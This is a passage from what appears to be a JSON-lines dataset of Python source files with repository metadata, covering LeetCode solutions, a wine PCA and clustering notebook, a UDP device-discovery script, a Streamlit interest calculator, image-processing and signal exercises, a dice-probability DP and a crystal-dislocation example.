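accuracy = (cm[0][0] + cm[1][1]) / cm.sum()      # correct / total
print(recall, recall_score(y_true, y_pred))      # 0.666..., same value
print(accuracy, accuracy_score(y_true, y_pred))  # 0.666..., same value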
]:\n\n\n\n","repo_name":"bhubesh757/Lets_upgrade_AIML","sub_path":"AIML_PROJECT_7/CreditCard_FraudDetection.py","file_name":"CreditCard_FraudDetection.py","file_ext":"py","file_size_in_byte":5594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22437678460","text":"class NestedInteger(object):\r\n def __init__(self, val):\r\n self.val = val\r\n\r\n def isInteger(self):\r\n return isinstance(self.val, int)\r\n\r\n def getInteger(self):\r\n return self.val if self.isInteger() else None\r\n\r\n def getList(self):\r\n return self.val if not self.isInteger() else None\r\n\r\n @classmethod\r\n def val2nestedInteger(cls, v):\r\n if isinstance(v, int):\r\n return cls(v)\r\n else:\r\n res = []\r\n for i in v:\r\n res.append(cls.val2nestedInteger(i))\r\n return cls(res)\r\n\r\n @classmethod\r\n def list2nestedList(cls, l):\r\n res = []\r\n for v in l:\r\n res.append(cls.val2nestedInteger(v))\r\n return res\r\n\r\n\r\nclass NestedIterator(object):\r\n def __init__(self, nestedList):\r\n self.stack = []\r\n self.iter = iter(nestedList)\r\n self.val = self.move_to_next()\r\n\r\n def move_to_next(self):\r\n while True:\r\n cur_val = next(self.iter, None)\r\n if cur_val is None:\r\n if len(self.stack):\r\n self.iter = self.stack.pop()\r\n else:\r\n return None\r\n elif cur_val.isInteger():\r\n return cur_val.getInteger()\r\n else:\r\n self.stack.append(self.iter)\r\n self.iter = iter(cur_val.getList())\r\n\r\n def next(self):\r\n res = self.val\r\n self.val = self.move_to_next()\r\n return res\r\n\r\n def hasNext(self):\r\n return self.val is not None\r\n\r\n\r\nif __name__ == '__main__':\r\n i, v = NestedIterator(NestedInteger.list2nestedList([[], 1])), []\r\n while i.hasNext():\r\n v.append(i.next())\r\n print(v)\r\n","repo_name":"MadSkittles/leetcode","sub_path":"341.py","file_name":"341.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"42603236618","text":"import numpy as np\r\n\r\n\"\"\"\r\nvoid rotate(int** matrix, int matrixSize, int* matrixColSize){\r\n //先转置矩阵\r\n for (int i = 0; i < matrixSize; ++i)\r\n for (int j = 0; j < i; ++j){\r\n int temp = matrix[i][j];\r\n matrix[i][j] = matrix[j][i];\r\n matrix[j][i] = temp;\r\n }\r\n \r\n //再镜像对称\r\n int left = 0;\r\n int right = matrixSize - 1;\r\n while (left < right){\r\n for (int i = 0; i < matrixSize; ++i){\r\n int temp = matrix[i][left];\r\n matrix[i][left] = matrix[i][right];\r\n matrix[i][right] = temp;\r\n }\r\n left++;\r\n right--;\r\n } \r\n}\r\n\"\"\"\r\nclass Solution(object):\r\n def rotate(self, matrix):\r\n \"\"\"\r\n :type matrix: List[List[int]]\r\n :rtype: void Do not return anything, modify matrix in-place instead.\r\n \"\"\"\r\n # rotate from outside to inside\r\n print(np.array(matrix))\r\n for i in range(len(matrix)):\r\n for j in range(i):\r\n temp = matrix[i][j]\r\n matrix[i][j] = matrix[j][i]\r\n matrix[j][i] = temp\r\n\r\n left = 0\r\n right = len(matrix) - 1\r\n while left < right:\r\n for i in range(len(matrix)):\r\n temp = matrix[i][left]\r\n matrix[i][left] = matrix[i][right]\r\n matrix[i][right] = temp\r\n\r\n left += 1\r\n right -= 1\r\n print(np.array(matrix))\r\n\r\ns = Solution()\r\ns.rotate([[1,2,3,4],[5,6,7,8],[9,10,11,12],[13,14,15,16]])\r\n\"\"\"\r\n[[ 1 2 3 4]\r\n [ 5 6 7 8]\r\n [ 9 10 11 12]\r\n [13 14 15 16]]\r\n[[13 9 5 1]\r\n [14 10 6 2]\r\n [15 11 7 3]\r\n [16 12 8 
4]]\r\n\"\"\"","repo_name":"liyunfei1994/MyProject","sub_path":"LeetCode/048_Rotate_Image.py","file_name":"048_Rotate_Image.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17599517230","text":"# Dados do problema:\n# Título: Transporte de Contêineres\n# Origem: Por OBI - Olimpíada Brasileira de Informática 2011 Brazil\n# Link: https://www.beecrowd.com.br/judge/pt/problems/view/2395\n\nA, B, C = input().split()\nA = int(A)\nB = int(B)\nC = int(C)\n\nX, Y, Z = input().split()\nX = int(X)\nY = int(Y)\nZ = int(Z)\n\nquantidade_largura = X // A\nquantidade_comprimento = Y // B\nquantidade_altura = Z // C\ntotal = quantidade_largura * quantidade_comprimento * quantidade_altura\nprint(total)\n","repo_name":"LucasTruppel/exercicios-logica","sub_path":"lista1/poo1_ex_1_14.py","file_name":"poo1_ex_1_14.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16556119891","text":"import random\nimport struct\n\n\nNETFINDER_SERVER_PORT = 3040\n\nNF_IDENTIFY = 0\nNF_IDENTIFY_REPLY = 1\nNF_ASSIGNMENT = 2\nNF_ASSIGNMENT_REPLY = 3\nNF_FLASH_ERASE = 4\nNF_FLASH_ERASE_REPLY = 5\nNF_BLOCK_SIZE = 6\nNF_BLOCK_SIZE_REPLY = 7\nNF_BLOCK_WRITE = 8\nNF_BLOCK_WRITE_REPLY = 9\nNF_VERIFY = 10\nNF_VERIFY_REPLY = 11\nNF_REBOOT = 12\nNF_SET_ETHERNET_ADDRESS = 13\nNF_SET_ETHERNET_ADDRESS_REPLY = 14\nNF_TEST = 15\nNF_TEST_REPLY = 16\n\nNF_SUCCESS = 0\nNF_CRC_MISMATCH = 1\nNF_INVALID_MEMORY_TYPE = 2\nNF_INVALID_SIZE = 3\nNF_INVALID_IP_TYPE = 4\n\nNF_MAGIC = 0x5A\n\nNF_IP_DYNAMIC = 0\nNF_IP_STATIC = 1\n\nNF_ALERT_OK = 0x00\nNF_ALERT_WARN = 0x01\nNF_ALERT_ERROR = 0xFF\n\nNF_MODE_BOOTLOADER = 0\nNF_MODE_APPLICATION = 1\n\nNF_MEMORY_FLASH = 0\nNF_MEMORY_EEPROM = 1\n\nNF_REBOOT_CALL_BOOTLOADER = 0\nNF_REBOOT_RESET = 1\n\n\nHEADER_FMT = \"!2cH6s2x\"\nIDENTIFY_FMT = HEADER_FMT\nIDENTIFY_REPLY_FMT = \"!H6c4s4s4s4s4s4s32s\"\nASSIGNMENT_FMT = \"!3xc4s4s4s32x\"\nASSIGNMENT_REPLY_FMT = \"!c3x\"\nFLASH_ERASE_FMT = HEADER_FMT\nFLASH_ERASE_REPLY_FMT = HEADER_FMT\nBLOCK_SIZE_FMT = HEADER_FMT\nBLOCK_SIZE_REPLY_FMT = \"!H2x\"\nBLOCK_WRITE_FMT = \"!cxHI\"\nBLOCK_WRITE_REPLY_FMT = \"!c3x\"\nVERIFY_FMT = HEADER_FMT\nVERIFY_REPLY_FMT = \"!c3x\"\nREBOOT_FMT = \"!c3x\"\nSET_ETHERNET_ADDRESS_FMT = \"!6s2x\"\nSET_ETHERNET_ADDRESS_REPLY_FMT = HEADER_FMT\nTEST_FMT = HEADER_FMT\nTEST_REPLY_FMT = \"!32s\"\n\nMAX_ATTEMPTS = 10\nMAX_TIMEOUT = 0.5\n\n#-----------------------------------------------------------------------------\ndef MkHeader(id, seq, eth_addr):\n return struct.pack(\n HEADER_FMT,\n bytes(chr(NF_MAGIC),\"utf-8\"),\n bytes(chr(id),\"utf-8\"),\n seq,\n bytes(eth_addr,\"utf-8\")\n ); \n#-----------------------------------------------------------------------------\ndef MkIdentify(seq):\n return MkHeader(NF_IDENTIFY, seq, '\\xFF\\xFF\\xFF\\xFF\\xFF\\xFF')\n\n#-----------------------------------------------------------------------------\ndef UnMkIdentifyReply(msg):\n hdrlen = struct.calcsize(HEADER_FMT)\n \n d = UnMkHeader(msg[0:hdrlen])\n \n params = struct.unpack(\n IDENTIFY_REPLY_FMT,\n msg[hdrlen:]\n ); \n \n d['uptime_days'] = params[0]\n d['uptime_hrs'] = ord(params[1])\n d['uptime_min'] = ord(params[2])\n d['uptime_secs'] = ord(params[3])\n d['mode'] = ord(params[4])\n d['alert'] = ord(params[5])\n d['ip_type'] = ord(params[6])\n d['ip_addr'] = params[7]\n d['ip_netmask'] = params[8]\n d['ip_gw'] = params[9]\n d['app_ver'] = params[10]\n 
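# Round-trip sketch of the Netfinder header format above ("!2cH6s2x": magic
# byte, message id, big-endian sequence number, 6-byte MAC, 2 pad bytes).
# The concrete values here are illustrative only.
import struct

HDR = "!2cH6s2x"
raw = struct.pack(HDR, bytes([0x5A]), bytes([0]), 1234, b"\xff" * 6)
assert len(raw) == struct.calcsize(HDR) == 12
magic, msg_id, seq, mac = struct.unpack(HDR, raw)
print(hex(magic[0]), msg_id[0], seq, mac.hex())   # 0x5a 0 1234 ffffffffffff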
d['boot_ver'] = params[11]\n d['hw_ver'] = params[12]\n d['name'] = params[13]\n return d\n\n#-----------------------------------------------------------------------------\ndef UnMkHeader(msg):\n params = struct.unpack(\n HEADER_FMT,\n msg\n ); \n \n d = {}\n d['magic'] = ord(params[0])\n d['id'] = ord(params[1])\n d['sequence'] = params[2]\n d['eth_addr'] = params[3]\n return d\n#-----------------------------------------------------------------------------\ndef FormatEthAddr(a):\n return \":\".join([\"%02X\" % i for i in a]) \n\n#-----------------------------------------------------------------------------\ndef PrintDetails(d):\n\n print()\n print(\"Ethernet Address: %s \" % FormatEthAddr(d['eth_addr']))\n print(\"Hardware: %s Bootloader: %s Application: %s\" % (socket.inet_ntoa(d['hw_ver']),\n socket.inet_ntoa(d['boot_ver']),\n socket.inet_ntoa(d['app_ver'])))\n #print \"Uptime:\", d['uptime_days'], 'days', d['uptime_hrs'], 'hours', d['uptime_min'], 'minutes', d['uptime_secs'], 'seconds'\n #if d['ip_type'] == NF_IP_STATIC:\n # print \"Static IP\"\n #elif d['ip_type'] == NF_IP_DYNAMIC:\n # print \"Dynamic IP\"\n #else: \n # print \"Unknown IP type\"\n print(\"IP Address: %s Mask :%s Gateway: %s\" % (socket.inet_ntoa(d['ip_addr']),\n socket.inet_ntoa(d['ip_netmask']),\n socket.inet_ntoa(d['ip_gw'])))\n #print \"Mode:\",\n #if d['mode'] == NF_MODE_BOOTLOADER:\n # print 'Bootloader'\n #elif d['mode'] == NF_MODE_APPLICATION:\n # print 'Application'\n #else:\n # print 'Unknown'\n\n#-----------------------------------------------------------------------------\n#-----------------------------------------------------------------------------\n\n\nimport socket\n\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\ns.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\ns.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)\nport = 0\ns.bind((\"10.220.0.2\", port))\nport = s.getsockname()[1]\n\nr = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nr.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\nr.setblocking(1)\nr.settimeout(0.500)\nr.bind(('', port))\n\nseq = random.randint(1, 65535)\nmsg = MkIdentify(seq)\n\ns.sendto(msg, ('', NETFINDER_SERVER_PORT))\nreply=r.recv(256)\nd=UnMkIdentifyReply(reply)\nPrintDetails(d)\n\n\n","repo_name":"lwbe/Prologix","sub_path":"new_netfindr.py","file_name":"new_netfindr.py","file_ext":"py","file_size_in_byte":5839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7818642186","text":"# To add a new cell, type '# %%'\n# To add a new markdown cell, type '# %% [markdown]'\n# %%\nfrom IPython import get_ipython\n\n# %%\nimport pandas as pd \nimport numpy as np \nimport matplotlib\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom warnings import filterwarnings\nget_ipython().run_line_magic('matplotlib', 'inline')\n\n\n# %%\n\n# for creating dendrogram \nfrom scipy.cluster.hierarchy import linkage\nimport scipy.cluster.hierarchy as sch\n\n\n# %%\nwine = pd.read_csv(\"wine.csv\")\nwine\n\n\n# %%\nwine.info()\n\n# %% [markdown]\n# ### all numeircal variables |\n\n# %%\nwine.isna().sum()\n\n# %% [markdown]\n# ### no missing values \n# %% [markdown]\n# ## Checking for Distribution of the data \n# \n\n# %%\na = 5 # number of rows\nb = 3 # number of columns\nc = 1 # initialize plot counter\n\nfig = plt.figure(figsize=(15,28))\n\nfor i in wine.columns:\n plt.subplot(a, b, c)\n plt.title('{}'.format(i))\n\n sns.histplot(data= wine, x= i)\n\n c = c + 1\n\nplt.show()\n\n# %% [markdown]\n# ## 
Numerical variables are usually of 2 type\n# ## Continous variable and Discrete Variables\n\n# %%\ndiscrete_feature=[feature for feature in wine.columns if len(wine[feature].unique())<25]\nprint(\"Discrete Variables Count: {}\".format(len(discrete_feature)))\n\n\n# %%\ncontinuous_feature=[feature for feature in wine.columns if feature not in discrete_feature ]\nprint(\"Continuous feature Count {}\".format(len(continuous_feature)))\n\n\n# %%\na = 7 # number of rows\nb = 2 # number of columns\nc = 1 # initialize plot counter\n\nfig = plt.figure(figsize=(13,20))\n\nfor i in continuous_feature:\n plt.subplot(a, b, c)\n\n sns.histplot(x= i ,data= wine, element= \"poly\", palette=\"deep\" )\n\n c = c + 1\n\nplt.show()\n\n# %% [markdown]\n# ## Checking for outliers\n\n# %%\na = 16 # number of rows\nb = 2 # number of columns\nc = 1 # initialize plot counter\n\nfig = plt.figure(figsize=(13,50))\n\nfor i in wine.columns:\n plt.subplot(a, b, c)\n\n sns.boxplot(x= i ,data= wine, palette=\"deep\" )\n\n c = c + 1\n\nplt.show()\n\n\n# %%\nfor i in wine.columns:\n s = wine[i]\n q1 = s.quantile(0.25)\n q3 = s.quantile(0.75)\n iqr = q3 - q1\n iqr_lower = q1 - 1.5 * iqr\n iqr_upper = q3 + 1.5 * iqr\n outliers = dict(s[(s < iqr_lower) | (s > iqr_upper)])\n\n print(f\"Details of {i} \\n\", \"IQR = \", iqr, \"\\n\", \"IQR lower \", iqr_lower, \"\\n\" , \"IQR upper \",iqr_upper, \"\\n\" ,\"outliers = \", outliers, \"\\n\"\n \n )\n\n# %% [markdown]\n# ## Replacing outlier with upper and lower limit\n\n# %%\nfor i in wine.columns:\n s = wine[i]\n q1 = s.quantile(0.25)\n q3 = s.quantile(0.75)\n iqr = q3 - q1\n iqr_lower = q1 - 1.5 * iqr\n iqr_upper = q3 + 1.5 * iqr\n\n wine[i] = pd.DataFrame(np.where(wine[i] > iqr_upper, iqr_upper, np.where(wine[i] < iqr_lower, iqr_lower, wine[i])))\n\n# %% [markdown]\n# ## outliers Removed\n\n# %%\nfor i in wine.columns:\n s = wine[i]\n q1 = s.quantile(0.25)\n q3 = s.quantile(0.75)\n iqr = q3 - q1\n iqr_lower = q1 - 1.5 * iqr\n iqr_upper = q3 + 1.5 * iqr\n outliers = dict(s[(s < iqr_lower) | (s > iqr_upper)])\n\n print(f\"Details of {i} \\n\", \"IQR = \", iqr, \"\\n\", \"IQR lower \", iqr_lower, \"\\n\" , \"IQR upper \",iqr_upper, \"\\n\" ,\"outliers = \", outliers, \"\\n\"\n \n )\n\n# %% [markdown]\n# # PCA\n\n# %%\nfrom sklearn.decomposition import PCA\nfrom sklearn.preprocessing import scale\n\n\n# %%\nlen(wine.columns) # all numerical columns\n\n\n# %%\nwine_normal = scale(wine) # Normalizing the numerical data \nwine_normal\n\n\n# %%\npca = PCA(n_components = 14)\npca_values = pca.fit_transform(wine_normal)\n\n\n# %%\n# The amount of variance that each PCA explains is \nvar = pca.explained_variance_ratio_\nvar\n\n\n# %%\n# Cumulative variance \n\nvar1 = np.cumsum(np.round(var, decimals = 4) * 100)\nvar1\n\n\n# %%\n\n# Variance plot for PCA components obtained \nplt.plot(var1, color = \"red\")\n\n\n# %%\n# PCA scores\npca_values\n\n\n# %%\npca_data = pd.DataFrame(pca_values)\npca_data.columns = ['comp0', 'comp1', 'comp2', 'comp3', 'comp4', 'comp5', 'comp6', 'comp7', 'comp8', 'comp9', 'comp10', 'comp11', 'comp12', 'comp13']\n\n\n# %%\nfinal_wine = pd.concat([wine.Type, pca_data.iloc[:, 0:6]], axis = 1)\nfinal_wine\n\n\n# %%\n# Scatter diagram\nimport matplotlib.pylab as plt\nplt.scatter(x = final_wine.comp0, y = final_wine.comp1)\n\n# %% [markdown]\n# # Heirarchical-Clustering\n\n# %%\n\n# Normalization function \ndef norm_func(i):\n x = (i-i.min())\t/ (i.max()-i.min())\n return (x)\n\n\n# %%\nheir_data_norm = norm_func(final_wine.iloc[:,:])\nheir_data_norm.describe()\n\n\n# 
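# The winsorising loop above can be reproduced in isolation: values past the
# 1.5*IQR fences are clipped to the fence (pandas' clip does the same thing).
import numpy as np
import pandas as pd

s = pd.Series([1, 2, 2, 3, 3, 4, 50])            # 50 is an obvious outlier
q1, q3 = s.quantile(0.25), s.quantile(0.75)
lo, hi = q1 - 1.5 * (q3 - q1), q3 + 1.5 * (q3 - q1)
clipped = pd.Series(np.where(s > hi, hi, np.where(s < lo, lo, s)))
assert (clipped == s.clip(lo, hi)).all()
print(clipped.tolist())                          # ends in 5.75 instead of 50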
%%\nheir_data_norm.isna().sum()\n\n\n# %%\nz = linkage( heir_data_norm, method = \"complete\", metric = \"euclidean\")\n\n\n# %%\n# Dendrogram\nplt.figure(figsize=(15, 8));plt.title('Hierarchical Clustering Dendrogram');plt.xlabel('Index');plt.ylabel('Distance')\nsch.dendrogram(z, \n leaf_rotation = 90, # rotates the x axis labels\n leaf_font_size = 10 # font size for the x axis labels\n)\nplt.show()\n\n\n# %%\nfrom sklearn.cluster import AgglomerativeClustering\n\n# %% [markdown]\n# ## Now applying AgglomerativeClustering choosing 5 as clusters from the above dendrogram\n\n# %%\nh_complete = AgglomerativeClustering(n_clusters = 8, linkage = 'complete', affinity = \"euclidean\").fit(heir_data_norm) \nh_complete.labels_\n\n\n# %%\ncluster_labels = pd.Series(h_complete.labels_)\nfinal_wine['clust'] = cluster_labels # creating a new column and assigning it to new column\n\n\n# %%\nfinal_wine.iloc[:, :].groupby(final_wine.clust).mean()\n\n# %% [markdown]\n# ## Plot of Heirarichical data clustering \n\n# %%\na = 6 # number of rows\nb = 2 # number of columns\nc = 1 # initialize plot counter\n\nfig = plt.figure(figsize=(13,30))\n\nfor i in final_wine.columns:\n plt.subplot(a, b, c)\n\n sns.histplot(x= i,data= final_wine, hue= \"clust\",palette=\"deep\", element= \"poly\" )\n\n c = c + 1\n\nplt.show()\n\n\n# %%\n\n\n\n","repo_name":"sonishrey9/PCA-_Dimension_Reduction","sub_path":"wine-PCA-heirarchical-clust.py","file_name":"wine-PCA-heirarchical-clust.py","file_ext":"py","file_size_in_byte":5700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7761307525","text":"import streamlit as st\nfrom calc import monthly_compound\n\n\n#documenttion found here: https://docs.streamlit.io/library\n\nst.title('How Rich Will I Be?')\n\ninitial = st.number_input(label='Initial value (£)', min_value=(0), max_value=(1000000000))\n\nmonthly = st.number_input(label='Monthly contribution (£)', min_value=(0), max_value=(1000000000))\n\nyears = st.number_input(label='Duration (years)', min_value=(0), max_value=(1000000000))\n\n#to run app go to command line and run: streamlit run app.py\n#to stop it running close command line or click ctr c continously \n#app found on this url: http://localhost:8501/\n\nannual_rate = st.slider(label = 'Annual interest rate (%)', min_value=1, max_value=12, step=1)\n\nfinal_sum = monthly_compound(initial, monthly, annual_rate, years)\n\nst.markdown(f'After {int(years)} years you would have £{round(final_sum, 2)} :sunglasses:')\n","repo_name":"kristineamalie/compound_interest_app","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26109953479","text":"'''\nExercicio 0\nDisciplina: MO443 Processamento de Imagens\nProfessor: Helio Pedrini\n1o. 
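# The Streamlit app above imports monthly_compound from a calc module that is
# not shown; a plausible stand-in (an assumption, not the author's code) that
# compounds the pot once per month and then adds the monthly contribution:
def monthly_compound(initial, monthly, annual_rate, years):
    rate = annual_rate / 100 / 12           # monthly rate from annual percent
    total = float(initial)
    for _ in range(int(years * 12)):
        total = total * (1 + rate) + monthly
    return total

print(round(monthly_compound(1000, 100, 5, 10), 2))   # roughly 17175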
semestre de 2018\n\nAluno: Edgar Kenji Tanaka\nRA: 023577\n'''\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom scipy import misc\n\ndef get_histogram(img, out_file):\n # show histogram\n plt.hist(img.ravel().astype(int), 256, [0, 256])\n plt.title(\"Histograma da imagem: \" + out_file)\n plt.savefig(out_file)\n plt.clf()\n\n\ndef print_stats(img, out_file):\n print('------------------------------------------')\n print(\"Estatisticas da imagem:\", out_file)\n print(\"largura:\", img.shape[0])\n print(\"altura:\", img.shape[1])\n print(\"intensidade minima:\", img.min())\n print(\"intensidade maxima:\", img.max())\n print(\"intensidade media: %.2f\" % img.mean())\n print('------------------------------------------\\n')\n\n\ndef get_negative(img, out_file):\n # get negative of the image\n negative_img = 255 - img\n plt.imshow(negative_img, cmap='gray', vmin=0, vmax=255)\n plt.title(\"Negativo: \" + out_file)\n plt.savefig(out_file)\n plt.clf()\n\n\ndef get_converted(img, out_file):\n # convert to gray intensity scale [120,180]\n # total range is 180 - 120 = 60\n # we'll use a simple rule of three\n converted_img = (img * (60/256)) + 120\n plt.imshow(converted_img, cmap='gray', vmin=0, vmax=255)\n plt.title(\"Transformacao de intensidade: \" + out_file)\n plt.savefig(out_file)\n plt.clf()\n\n\ndef main():\n files = [\n 'baboon.png',\n 'butterfly.png',\n 'city.png',\n 'house.png',\n 'seagull.png',\n ]\n\n print('------------- Pre-requirements -----------')\n print('The following files must be in the current directory:')\n print(', '.join(files))\n print('------------------------------------------\\n')\n print('\\n\\n')\n\n for f in files:\n # open image file and stores it in a numpy array\n img = misc.imread(f)\n\n print_stats(img, f)\n get_histogram(img, 'histogram.' + f)\n get_negative(img, 'negative.' + f)\n get_converted(img, 'converted.' + f)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"edgartanaka/mo443","sub_path":"ex0/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34845432580","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 1 11:49:32 2022\n\n@author: halfghostx\n@name: Program_1_19.py\n@function: Sine signal and low sampling frequency\n@Python version: Python 3.8\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Sine signal and low sampling frequency. \nfy = 1# Signal frequency in Hz. \nwy = 2*np.pi*fy# Signal frequency in rad/s. \nfs = 7# Sampling frequency in Hz. \ntiv = 1/fs# Time interval between samples. \nt = np.arange(0,3,tiv)# Time intervals set. \ny = np.sin(wy*t)# Signal data set. \nplt.plot(t,y,'-kd',markerfacecolor='none')# Plots figure. 
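# General form of the intensity transform in the MO443 exercise above:
# linearly squeeze grey levels from [0, 255] into an arbitrary [lo, hi].
import numpy as np

def remap_intensity(img, lo=120, hi=180):
    return img * ((hi - lo) / 256) + lo

sample = np.array([[0, 128, 255]], dtype=float)
print(remap_intensity(sample))   # [[120. 150. 179.77...]]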
\nplt.xlim(0,3)\nplt.ylim(-1.5,1.5)\nplt.xlabel('seconds')\nplt.title('sine signal')\nplt.show()","repo_name":"halfghostx/DigitalSignalProcessing","sub_path":"DigitalSignalProcessingPythonCode/VolumeI/PartI/1.PeriodicSignals/Program_1_19.py","file_name":"Program_1_19.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"74121529426","text":"# https://atcoder.jp/contests/tdpc/submissions/19700500\n# D - サイコロ\nimport sys\n\nsys.setrecursionlimit(10 ** 7)\ninput = sys.stdin.readline\nf_inf = float('inf')\nmod = 10 ** 9 + 7\n\n\ndef resolve():\n n, d = map(int, input().split())\n\n x = d\n cnt2 = cnt3 = cnt5 = 0\n while x % 2 == 0:\n x //= 2\n cnt2 += 1\n while x % 3 == 0:\n x //= 3\n cnt3 += 1\n while x % 5 == 0:\n x //= 5\n cnt5 += 1\n if x != 1:\n print(0)\n exit()\n\n dp = [[[[0] * (cnt5 + 1) for _ in range(cnt3 + 1)] for _ in range(cnt2 + 1)] for _ in range(n + 1)]\n dp[0][0][0][0] = 1\n for i in range(n):\n for j in range(cnt2 + 1):\n for k in range(cnt3 + 1):\n for l in range(cnt5 + 1):\n now = dp[i][j][k][l]\n dp[i + 1][j][k][l] += now * 1 / 6 # 1が出る\n dp[i + 1][min(j + 1, cnt2)][k][l] += now * 1 / 6 # 2が出る\n dp[i + 1][j][min(k + 1, cnt3)][l] += now * 1 / 6 # 3が出る\n dp[i + 1][min(j + 2, cnt2)][k][l] += now * 1 / 6 # 4が出る\n dp[i + 1][j][k][min(l + 1, cnt5)] += now * 1 / 6 # 5が出る\n dp[i + 1][min(j + 1, cnt2)][min(k + 1, cnt3)][l] += now * 1 / 6 # 6が出る\n res = dp[n][cnt2][cnt3][cnt5]\n print(res)\n\n\nif __name__ == '__main__':\n resolve()\n","repo_name":"happa64/AtCoder_Beginner_Contest","sub_path":"Unrated/TDPC/TDPC_D.py","file_name":"TDPC_D.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8917784333","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 13 11:51:30 2022\n\n@author: pmetz1\n\"\"\" \n\n# 3rd party\nimport numpy as np\n\n# package\nfrom pymls import Lattice, Dislocation, Stroh, MLS\nfrom pymls.elastic import cij_from_group, cij_from_dict\nfrom pymls.toolbox import abt\nfrom pymls.symmetry import Symmetry as SO\nimport pymls.toolbox as tbx\n\n\n# - 1. crystal lattice\nlattice_scalar = (4.03,) * 3 + (90,) * 3\n\n# - 2. slip system\nhkl = np.array((1,1,1)) # FCC slip plane\nuvw = np.array((1,-1,0)) # burgers vector\nl = np.cross(uvw, hkl) # defines edge dislocation\nphi = abt(uvw, l, degrees=True) # 90 degrees == edge dislocation\nchi = abt(hkl, uvw, degrees=True)\n\n# - 3. elastic constituents\nC = cij_from_group(116.3, 64.8, 30.9, group='m-3m') # GPa\n\n# - 4. class instances\nL = Lattice.from_scalar( lattice_scalar )\nD = Dislocation(lattice=L, hkl=hkl, uvw=uvw, phi=phi, SGno=None)\nS = Stroh(C) # captures characteristic elastic matrix and eigensolution\nI = MLS(dislocation=D, cij=C) # captures sum computation\n\n# - 5. 
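# The dice DP above depends on the exponents of 2, 3 and 5 in D; the three
# while-loops that extract them generalise to this small helper:
def prime_exponents(x, primes=(2, 3, 5)):
    exps = []
    for p in primes:
        e = 0
        while x % p == 0:
            x //= p
            e += 1
        exps.append(e)
    return exps, x          # leftover != 1 means D has another prime factor

print(prime_exponents(360))   # ([3, 2, 1], 1) since 360 = 2^3 * 3^2 * 5
print(prime_exponents(14))    # ([1, 0, 0], 7) -> the DP would print 0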
compute values\n# Anizc\n# b[1,-1,0]; n[1,1,1]; l[-1,-1,2]; g[1,-1,0]\nCanzic = 0.51008962\nCmls = I.Chkl(uvw)\nprint(f'Anzic: {Canzic:.6f}; this work: {Cmls:.6f}')\nprint(f'Differs by Canzic / Cmls == {Canzic / Cmls:.6f}')\n\n# plot\nD.visualize()\nI.plot_u()\n\n\n# =============================================================================\n# #%% Sym Eqs\n# # m-3m (215) https://it.iucr.org/Ac/ch2o3v0001/sgtable2o3o225/\n# # 1\n# # 2 || (x,0,0), (0,y,0)\n# # 3 || (x,x,x)\n# # 2 || (x,x,0)\n# # -1 || (0,0,0)\n# R2x00 = SO.rotation((1,0,0), 180)\n# R20y0 = SO.rotation((0,1,0), 180)\n# R3xxx = SO.rotation((1,1,1), 120)\n# R2xx0 = SO.rotation((1,1,0), 180)\n# Inv = SO.inversion()\n# SOS = (R2x00, R20y0, R3xxx, R2xx0, Inv) # set of generators\n# N = (1, 1, 2, 1, 1) # number of times to operate\n# \n# slip = [hkl, uvw]\n# for _ in range(4): # redundant\n# for symOpp, nOpp in list(zip(SOS, N)): # for symOpp in generator set\n# for _ in range(nOpp): # do N times\n# slip = np.asarray(slip).reshape((-1,3)) # ...\n# slip = np.concatenate((slip, symOpp(slip))) # append new symmetric elements\n# slip = slip.reshape((-1,2,3)) # ...\n# slip = tbx.get_unique_pairs(slip) # find unique pairs (elements)\n# # slip = slip.astype(int) # this is changing nominal 1 values to zeros for some reason.... =(\n# slip = np.round(slip, decimals=0).astype(int)\n# m = ~np.array([np.dot(*e) for e in slip], dtype=bool)\n# \n# \n# \n# all_combinations = []\n# for uvw, hkl in slip[m]:\n# dislocation = Dislocation(lattice=lattice, hkl=hkl, uvw=uvw, phi=phi, SGno=None)\n# stroh = Stroh(C) # captures characteristic elastic matrix and eigensolution\n# calc = MLS(dislocation=dislocation, cij=C) # captures sum computation\n# all_combinations.append(calc)\n# \n# s = (1,1,0)\n# mean = np.mean([e.Chkl(s) for e in all_combinations])\n# \n# \n# =============================================================================\n","repo_name":"PetMetz/pymls","sub_path":"examples/aluminum-fcc.py","file_name":"aluminum-fcc.py","file_ext":"py","file_size_in_byte":3035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20115030301","text":"import os\nimport ctypes\nimport shutil\n\nuser32 = ctypes.windll.user32\nf_width = 